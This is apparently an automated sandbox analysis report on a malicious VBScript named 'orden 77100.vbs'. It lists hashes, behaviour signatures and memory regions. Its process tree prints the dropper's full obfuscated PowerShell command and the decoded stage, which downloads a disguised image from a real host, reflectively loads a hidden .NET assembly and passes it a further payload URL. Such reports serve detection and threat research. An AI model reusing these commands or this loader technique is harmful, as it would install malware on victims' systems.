Analysis

  • max time kernel
    219s
  • max time network
    231s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2023 19:11

General

  • Target

    orden 77100.vbs

  • Size

    292KB

  • MD5

    1d804c707e82e967ce7e47519f292d49

  • SHA1

    45571fbb7f244f8a31fa6f3faeab7fcaae3035f2

  • SHA256

    b116b683c17736feafd9b3d20bb58b8e45fd2cab888145fc3891f46e38ef0f2a

  • SHA512

    88174c038e82f6db6c63f15fc96fb7c00b8350f2b70d2bf8095004195cab828dd3c6cdec3fd76e1e29335c70c6d93de49f94d8177c68c0d8929419ed0df94682

  • SSDEEP

    1536:GA4xi/NbR0k4NkOhXCcsBsrsT0sGz/razpazpNz2zLzUzTzpzqvzSzazSz3zbzTI:axi/NbCk4NkOhycsBsrsT0s0ruuw97

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

exe.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\orden 77100.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDEDgTreNgDgTrevDgTreDYDgTreMDgTreDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrecgB1DgTreG0DgTrecDgTreBfDgTreHYDgTreYgBzDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDYDgTreOQDgTre1DgTreDQDgTreMDgTreDgTre4DgTreDkDgTreMwDgTre3DgTreCcDgTreOwDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTreuDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreKQDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreEYDgTreaQBiDgTreGUDgTrecgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgDgTre0DgTreDYDgTreZQBzDgTreGEDgTreYgBvDgTreG8DgTreZDgTreBlDgTreHYDgTreLwDgTrezDgTreDYDgTreLgDgTrezDgTreDMDgTreLgDgTreyDgTreDQDgTreLgDgTrezDgTreDkDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGYDgTreZDgTreBmDgTreGQDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZgBkDgTreGYDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZgBkDgTreGYDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreYQBkDgTreHMDgTreYQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBjDgTreHUDgTreJwDgTrepDgTreCkDgTre'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.46esaboodev/36.33.24.391//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxfsigwt.fhe.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3004-47-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-15-0x0000025539520000-0x0000025539530000-memory.dmp

    Filesize

    64KB

  • memory/3004-97-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-95-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-13-0x00007FFBE50A0000-0x00007FFBE5B61000-memory.dmp

    Filesize

    10.8MB

  • memory/3004-14-0x0000025539520000-0x0000025539530000-memory.dmp

    Filesize

    64KB

  • memory/3004-51-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-25-0x0000025539520000-0x0000025539530000-memory.dmp

    Filesize

    64KB

  • memory/3004-93-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-91-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-89-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-53-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-30-0x0000025539520000-0x0000025539530000-memory.dmp

    Filesize

    64KB

  • memory/3004-31-0x0000025539520000-0x0000025539530000-memory.dmp

    Filesize

    64KB

  • memory/3004-32-0x0000025539520000-0x0000025539530000-memory.dmp

    Filesize

    64KB

  • memory/3004-33-0x000002553A290000-0x000002553A5B2000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-34-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-35-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-37-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-39-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-49-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-43-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-45-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-87-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-41-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-85-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-29-0x00007FFBE50A0000-0x00007FFBE5B61000-memory.dmp

    Filesize

    10.8MB

  • memory/3004-55-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-57-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-59-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-61-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-63-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-65-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-67-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-69-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-71-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-73-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-75-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-77-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-79-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-81-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/3004-83-0x000002553A290000-0x000002553A5AC000-memory.dmp

    Filesize

    3.1MB

  • memory/4008-10-0x00007FFBE50A0000-0x00007FFBE5B61000-memory.dmp

    Filesize

    10.8MB

  • memory/4008-0-0x000001BE69B70000-0x000001BE69B92000-memory.dmp

    Filesize

    136KB

  • memory/4008-28-0x000001BE51040000-0x000001BE51050000-memory.dmp

    Filesize

    64KB

  • memory/4008-27-0x000001BE51040000-0x000001BE51050000-memory.dmp

    Filesize

    64KB

  • memory/4008-26-0x00007FFBE50A0000-0x00007FFBE5B61000-memory.dmp

    Filesize

    10.8MB

  • memory/4008-12-0x000001BE51040000-0x000001BE51050000-memory.dmp

    Filesize

    64KB

  • memory/4008-11-0x000001BE51040000-0x000001BE51050000-memory.dmp

    Filesize

    64KB